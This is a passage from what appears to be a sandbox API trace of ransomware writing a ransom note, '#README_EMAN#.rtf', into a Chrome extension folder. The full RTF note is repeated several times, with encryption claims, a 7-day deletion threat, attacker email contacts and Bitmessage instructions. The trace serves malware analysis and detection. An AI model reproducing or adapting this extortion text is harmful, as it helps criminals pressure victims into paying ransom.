.\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.265] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.266] CloseHandle (hObject=0x2c8) returned 1 [0280.266] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\#readme_eman#.rtf")) returned 0xffffffff [0280.266] GetLastError () returned 0x2 [0280.266] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.267] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.267] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.267] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 